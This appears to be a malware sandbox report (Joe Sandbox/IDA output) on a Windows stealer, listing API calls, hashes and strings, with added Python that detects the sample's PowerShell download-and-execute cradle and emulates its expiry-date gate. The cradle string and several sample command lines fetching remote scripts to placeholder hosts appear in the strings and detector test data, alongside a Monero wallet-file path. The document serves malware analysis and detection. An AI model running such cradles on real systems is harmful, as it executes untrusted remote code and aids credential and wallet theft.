                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: CurrentBuildNumber
                                        • API String ID: 3225020163-1022791448
                                        • Opcode ID: 27bbbdcf4765792617557c0de255757a3745ae76db8d9fde3ec0cb2f7a8ab59d
                                        • Instruction ID: 9389387be4cbbd7eb2a41314a2cf3a2a9a842267995f797692c09b3a52655f1e
                                        • Opcode Fuzzy Hash: 27bbbdcf4765792617557c0de255757a3745ae76db8d9fde3ec0cb2f7a8ab59d
                                        • Instruction Fuzzy Hash: 9301F4B9A44309BBDB00DFE4EC49FAE7778EB44701F1045A4F605A7281DB709A00CB95
                                        APIs
                                        • memset.MSVCRT ref: 00194325
                                        • RegOpenKeyExA.ADVAPI32(80000001,011CD9C0,00000000,00020119,?), ref: 00194344
                                        • RegQueryValueExA.ADVAPI32(?,011CE350,00000000,00000000,00000000,000000FF), ref: 00194368
                                        • RegCloseKey.ADVAPI32(?), ref: 00194372
                                        • lstrcat.KERNEL32(?,00000000), ref: 00194397
                                        • lstrcat.KERNEL32(?,011CE368), ref: 001943AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseOpenQueryValuememset
                                        • String ID:
                                        • API String ID: 2623679115-0
                                        • Opcode ID: 41113a42e25e514fbe1677ed8c665c2e5d29ef6cf6af665810391480efd49a4d
                                        • Instruction ID: da93f8a67e692032f0e7d510b1f839365c2b09bbf34e27abcc9e78f96e8baa49
                                        • Opcode Fuzzy Hash: 41113a42e25e514fbe1677ed8c665c2e5d29ef6cf6af665810391480efd49a4d
                                        • Instruction Fuzzy Hash: 934199B69002086BDF14FBA0EC46FEE733DAB99700F4445ACB71657182EB7597888BD1
                                        APIs
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0018A13C
                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0018A161
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 0018A181
                                        • ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 0018A1AA
                                        • LocalFree.KERNEL32(0018148F), ref: 0018A1E0
                                        • CloseHandle.KERNEL32(000000FF), ref: 0018A1EA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                        • String ID:
                                        • API String ID: 2311089104-0
                                        • Opcode ID: 79e82be53c191370dd69b0117bcb85f9fe2fe1be506e7d7e58eb0020257c41cc
                                        • Instruction ID: d925f84a34765753f8fbbc86e649ee2384e9f017f7c44b97611163ae34cfe86a
                                        • Opcode Fuzzy Hash: 79e82be53c191370dd69b0117bcb85f9fe2fe1be506e7d7e58eb0020257c41cc
                                        • Instruction Fuzzy Hash: 52312B74A00209EFDB14DFA4D889BEE7BB5BF48701F508169F911A7390D774AA81CFA1
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String___crt$Typememset
                                        • String ID:
                                        • API String ID: 3530896902-3916222277
                                        • Opcode ID: 1c65370e15245fc0b6cb9b136177f45a1c5249b2bebe2d136da08110fd21fe13
                                        • Instruction ID: 03f6ba08c6dc2b8ee90d12c80d07583f87bd5e229e4e09dedc0db44517c8fe48
                                        • Opcode Fuzzy Hash: 1c65370e15245fc0b6cb9b136177f45a1c5249b2bebe2d136da08110fd21fe13
                                        • Instruction Fuzzy Hash: B641F4B010079C9EDF218B288D95FFBBFE8AB45304F1444E8E9CA97182D3719A44CFA0
                                        APIs
                                        • lstrcat.KERNEL32(?,011CE3F8), ref: 00194A2B
                                          • Part of subcall function 00198F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00198F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00194A51
                                        • lstrcat.KERNEL32(?,?), ref: 00194A70
                                        • lstrcat.KERNEL32(?,?), ref: 00194A84
                                        • lstrcat.KERNEL32(?,011BB798), ref: 00194A97
                                        • lstrcat.KERNEL32(?,?), ref: 00194AAB
                                        • lstrcat.KERNEL32(?,011CD8A0), ref: 00194ABF
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 00198F20: GetFileAttributesA.KERNEL32(00000000,?,00181B94,?,?,001A577C,?,?,001A0E22), ref: 00198F2F
                                          • Part of subcall function 001947C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001947D0
                                          • Part of subcall function 001947C0: RtlAllocateHeap.NTDLL(00000000), ref: 001947D7
                                          • Part of subcall function 001947C0: wsprintfA.USER32 ref: 001947F6
                                          • Part of subcall function 001947C0: FindFirstFileA.KERNEL32(?,?), ref: 0019480D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                        • String ID:
                                        • API String ID: 2540262943-0
                                        • Opcode ID: fdadca9f87348b47f455dd7a24a00b489ea7bf8ccb1e60158dea7f5bb570fb22
                                        • Instruction ID: c0b6cf55956f90c93862e64ae85c911504e03c288dd28d3242659802589b837e
                                        • Opcode Fuzzy Hash: fdadca9f87348b47f455dd7a24a00b489ea7bf8ccb1e60158dea7f5bb570fb22
                                        • Instruction Fuzzy Hash: 83315EB2900208A7DF14FBB0DC85EDD733CAB68701F444599B24696052EF70E7898B94
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00192FD5
                                        Strings
                                        • <, xrefs: 00192F89
                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00192F14
                                        • ')", xrefs: 00192F03
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00192F54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                         • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        • API String ID: 3031569214-898575020
                                        • Opcode ID: 8ead1b7ea8c15a0e20f43a73dde82ebbee25859465cd62dc1cd03539650fd54d
                                        • Instruction ID: 28f51adb6a4e271b758d8a555276ce7171614c8d45f0656d178b09e797f6aaa8
                                        • Opcode Fuzzy Hash: 8ead1b7ea8c15a0e20f43a73dde82ebbee25859465cd62dc1cd03539650fd54d
                                        • Instruction Fuzzy Hash: 3741CC71D102089ADF14EBA0C8A2BEDB779BF24300F804559F1166B192DF716A4DCFD5
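The strings referenced at 00192F03, 00192F14 and 00192F54 are concatenated into a command line for the 32-bit PowerShell host and handed to ShellExecuteEx at 00192FD5: the download-and-execute cradle `-nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')"` (the URL itself is not recovered in this entry). The Python below is an added detection example, not part of the Joe Sandbox report or of the sample; it runs the rule over process-creation events constructed here in the shape of Sysmon Event ID 1 records, with placeholder hostnames under the reserved .invalid domain.

```python
import re

# Markers of the cradle the sample assembles:
#   powershell.exe -nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')"
# Whitespace is optional wherever PowerShell tolerates it; the match is case-insensitive
# and also accepts the fully qualified System.Net.WebClient spelling.
CRADLE_RE = re.compile(
    r"iex\s*\(\s*new-object\s+(?:system\.)?net\.webclient\s*\)\s*\.\s*downloadstring"
    r"\s*\(\s*['\"]?(?P<url>[^'\")]*)",
    re.IGNORECASE,
)
# -nop, -nopr, ..., -noprofile: PowerShell accepts any unambiguous prefix of the switch.
NOPROFILE_RE = re.compile(r"(?<!\S)-nop\w*", re.IGNORECASE)


def classify(event):
    """Return a finding dict for a download-and-execute cradle, or None for a benign launch."""
    cmdline = event["cmdline"]
    m = CRADLE_RE.search(cmdline)
    if m is None:
        return None
    reasons = ["Invoke-Expression over Net.WebClient.DownloadString (remote script run in memory)"]
    if NOPROFILE_RE.search(cmdline):
        reasons.append("-nop suppresses the profile, typical of scripted launches")
    if "\\syswow64\\" in event["image"].lower():
        reasons.append("32-bit PowerShell host: the launcher is a WOW64 process")
    return {"parent": event["parent"], "url": m["url"], "reasons": reasons}


def scan(events):
    """Apply classify() to a stream of process-creation events and keep the hits."""
    return [f for f in map(classify, events) if f is not None]


# Constructed process-creation events (not taken from the sandbox report); the fields mirror
# Sysmon Event ID 1. Hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\user\Desktop\file.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -nop -c "iex(New-Object Net.WebClient).DownloadString('http://c2.example.invalid/p')"'''},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -NoProfile -Command Get-Process'},
    {"parent": r"C:\Program Files\Vendor\updater.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\Vendor\update.ps1'},
    {"parent": r"C:\Users\user\AppData\Local\Temp\stage.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''powershell -nop -w hidden -c "IEX (New-Object System.Net.WebClient).DownloadString('https://cdn.example.invalid/s.ps1')"'''},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The rule keys on the Invoke-Expression plus WebClient.DownloadString combination rather than on -nop alone, which benign automation uses constantly. The SysWOW64 host path is only a supporting signal: a 32-bit launcher that asks for the System32 powershell.exe is redirected to SysWOW64 by WOW64 file-system redirection anyway, so a production query should match either path.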
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                         • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: dllmain_raw$dllmain_crt_dispatch
                                        • String ID:
                                        • API String ID: 3136044242-0
                                        • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                        • Instruction ID: f17f523cb94ebd8a2783a5996797ad3b763c54ac58e5e2f770485607960de433
                                        • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                        • Instruction Fuzzy Hash: 5821CF72D0062DAFDB219F19CE41A7F3A79EB91BA4F064119FA1CA7211C3308D41ABE0
                                        APIs
                                        • GetSystemTime.KERNEL32(?), ref: 00196C0C
                                        • sscanf.NTDLL ref: 00196C39
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00196C52
                                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00196C60
                                        • ExitProcess.KERNEL32 ref: 00196C7A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                         • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$System$File$ExitProcesssscanf
                                        • String ID:
                                        • API String ID: 2533653975-0
                                        • Opcode ID: dee319b46c13bd87f6f786dd1c9dca694b7f2ca8d6c0f2166abaa0e284bbd74e
                                        • Instruction ID: fd1b68f449fc95791a1ed19a2d88719118a3f2b59041c4783825c5d36a622c3f
                                        • Opcode Fuzzy Hash: dee319b46c13bd87f6f786dd1c9dca694b7f2ca8d6c0f2166abaa0e284bbd74e
                                        • Instruction Fuzzy Hash: 2B21CB75D14208ABCF04EFE4E8459EEB7B9BF48301F04856AF506A3251EB349608CB69
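The entry at 00196C0C to 00196C7A reads the clock (GetSystemTime), parses a date out of a stored string (sscanf), converts both values to FILETIME (the two SystemTimeToFileTime calls) and can end in ExitProcess. That is the shape of a time gate: two FILETIMEs compared as 64-bit integers, with the sample quitting once the wall clock is past an embedded date. The report does not show the sscanf format string, the direction of the comparison, or what happens when parsing fails, so all three are assumptions in the added Python emulation below (a "%d-%d-%d" YYYY-MM-DD format, exit when now is later than the deadline, no exit on a parse failure); the code is not taken from the report or the sample. Its practical use is to tell, before a long dynamic run, whether a given build has already expired, in which case the sandbox records little beyond ExitProcess unless the VM clock is moved back.

```python
import re
from datetime import datetime, timezone

# 100-ns ticks between 1601-01-01 (the FILETIME epoch) and 1970-01-01 (the Unix epoch).
FILETIME_UNIX_EPOCH = 116444736000000000
_EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)

# Assumed sscanf-style "%d-%d-%d" (YYYY-MM-DD); the report does not show the real format string.
_DEADLINE_RE = re.compile(r"^\s*(\d{1,4})-(\d{1,2})-(\d{1,2})")


def systemtime_to_filetime(year, month, day, hour=0, minute=0, second=0, millis=0):
    """Emulate SystemTimeToFileTime: 100-ns ticks since 1601-01-01 UTC.

    Returns None where the API would return FALSE (a calendar-invalid SYSTEMTIME).
    """
    try:
        when = datetime(year, month, day, hour, minute, second, millis * 1000, tzinfo=timezone.utc)
    except ValueError:
        return None
    delta = when - _EPOCH_1601
    return (delta.days * 86_400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def parse_deadline(text):
    """Emulate the sscanf call: pull (year, month, day) out of the embedded date string."""
    m = _DEADLINE_RE.match(text)
    return tuple(int(g) for g in m.groups()) if m else None


def gate_would_exit(deadline_text, now):
    """Return True when the time gate would reach ExitProcess at the given wall-clock time.

    `now` stands in for GetSystemTime (which reports UTC): a datetime, or an ISO-8601 string.
    Assumption: a date that fails to parse or convert does not trigger the exit.
    """
    if isinstance(now, str):
        now = datetime.fromisoformat(now)
    if now.tzinfo is None:
        now = now.replace(tzinfo=timezone.utc)
    now = now.astimezone(timezone.utc)

    fields = parse_deadline(deadline_text)
    if fields is None:
        return False
    deadline_ft = systemtime_to_filetime(*fields)
    if deadline_ft is None:
        return False
    now_ft = systemtime_to_filetime(now.year, now.month, now.day, now.hour,
                                    now.minute, now.second, now.microsecond // 1000)
    # The native code compares the two FILETIMEs as 64-bit integers; a deadline without a
    # time of day is midnight UTC, so the gate closes at the first tick of the next day.
    return now_ft > deadline_ft


if __name__ == "__main__":
    print(gate_would_exit("2024-10-31", datetime.now(timezone.utc)))
```

When the gate has already closed, the fastest way to get a useful run is to set the analysis VM clock to a date before the deadline, or to patch the comparison; the FILETIME arithmetic above is what lets you pick a safe date rather than guessing.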
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00197FC7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00197FCE
                                        • RegOpenKeyExA.ADVAPI32(80000002,011BC278,00000000,00020119,?), ref: 00197FEE
                                        • RegQueryValueExA.ADVAPI32(?,011CD720,00000000,00000000,000000FF,000000FF), ref: 0019800F
                                        • RegCloseKey.ADVAPI32(?), ref: 00198022
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                         • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
